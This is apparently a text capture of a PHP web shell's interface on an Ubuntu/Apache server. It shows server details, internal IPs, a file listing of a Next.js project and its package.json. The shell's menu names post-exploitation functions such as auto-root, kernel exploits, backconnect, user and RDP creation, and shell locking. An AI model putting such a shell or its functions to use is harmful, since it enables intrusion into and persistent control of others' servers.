Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
persisst /
PerSIsst-Lab-main /
v6 /
[ HOME SHELL ]
Name
Size
Permission
Action
.next
[ DIR ]
drwxr-xr-x
.vscode
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
out
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.eslintrc.json
64
B
-rw-r--r--
.gitignore
497
B
-rw-r--r--
README.md
1.45
KB
-rw-r--r--
components.json
468
B
-rw-r--r--
next-env.d.ts
228
B
-rw-r--r--
next.config.ts
493
B
-rw-r--r--
package-lock.json
108.85
KB
-rw-r--r--
package.json
936
B
-rw-r--r--
postcss.config.mjs
143
B
-rw-r--r--
tailwind.config.ts
3.58
KB
-rw-r--r--
tsconfig.json
649
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "v6", "version": "0.1.0", "private": true, "scripts": { "dev": "next dev", "build": "next build", "start": "next start", "lint": "next lint", "export": "next build && next export" }, "dependencies": { "@radix-ui/react-accordion": "^1.2.2", "@react-three/fiber": "^8.17.10", "class-variance-authority": "^0.7.1", "clsx": "^2.1.1", "framer-motion": "^11.11.10", "lucide-react": "^0.460.0", "motion": "^12.0.5", "next": "^15.0.1", "react": "^18.2.0", "react-dom": "^18.2.0", "react-icons": "^5.4.0", "tailwind-merge": "^2.6.0", "tailwindcss-animate": "^1.0.7", "three": "^0.169.0" }, "devDependencies": { "@types/node": "^20", "@types/react": "^18", "@types/react-dom": "^18", "@types/three": "^0.172.0", "postcss": "^8", "tailwindcss": "^3.4.1", "typescript": "^5" } }
Close